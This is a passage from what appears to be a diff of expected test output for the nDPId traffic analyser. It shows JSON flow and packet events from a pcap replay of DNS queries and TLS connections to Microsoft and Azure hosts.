{"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1626168077439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1626168077439,"pkt":"8BiYFWV8WNVuaKQACABFAAC9hRIAAHgR6uwICAgIwKgBeQA10nwAqSezww2BgAABAAMAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAANmgAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAARUANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTItZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8BbAAEAAQAAAAQABChxCi8="} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168077439,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.113.10.47"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168077439,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.113.10.47"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1626168077441,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1626168077441,"pkt":"WNVuaKQA8BiYFWV8CABFAABlf9gAAEARKH\/AqAF5CAgICP\/UADUAUcNfVk0BAAABAAAAAAAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAQ=="} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077469,"flow_last_seen":1626168077469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077469,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1626168077469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077469,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KWAbtjvPcwAAAAALAC\/\/\/cwgAAAgQFtAEDAwYBAQgKPdH4ZwAAAAAEAgAA"} 
00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1626168077486,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1626168077486,"pkt":"8BiYFWV8WNVuaKQACABFAADs3EYAAHkRkokICAgIwKgBeQA12Q8A2KuGXeWBgAABAAIAAQAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQABwAwABQABAAAN4AAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAAG0ANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTEtZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8B0AAYAAQAAADsAMwRwcmQxDmF6dXJlZG5zLWNsb3VkwEoGbXNuaHN0wBEAACcRAAADhAAAASwACTqAAAAAPA=="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077506,"flow_last_seen":1626168077506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077506,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1626168077506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077506,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KXAbtENsV0AAAAALAC\/\/8t3wAAAgQFtAEDAwYBAQgKPdH4jAAAAAAEAgAA"} 
00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1626168077507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1626168077507,"pkt":"8BiYFWV8WNVuaKQACABFAACx7P0AAHkRgg0ICAgIwKgBeQA1\/9QAnZiFVk2BgAABAAAAAQAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAcAlAAYAAQAAADsAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMBAAAAnEQAAA4QAAAEsAAk6gAAAADw="} -00836{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00836{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077517,"pkt":"8BiYFWV8WNVuaKQACABFAAA0QHFAAG0G2JEocQovwKgBeQG70pbavX69Y7z3MYAS\/\/\/xlwAAAgQFoAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077517,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KWAbtjvPcx2r1+vlAQEAAiVwAA"} 
-00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077557,"pkt":"8BiYFWV8WNVuaKQACABFAAA0ihJAAG0GjvAocQovwKgBeQG70pd9bt1TRDbFdYAS\/\/9BkgAAAgQFoAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077557,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KXAbtENsV1fW7dVFAQEAByUQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/efAAAEARLo3AqAF5CAgICMikADUAK6rjycUBAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAABBAAE="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/el4AAEARLh\/AqAF5CAgICOMxADUAK47tCy8BAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAE="} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 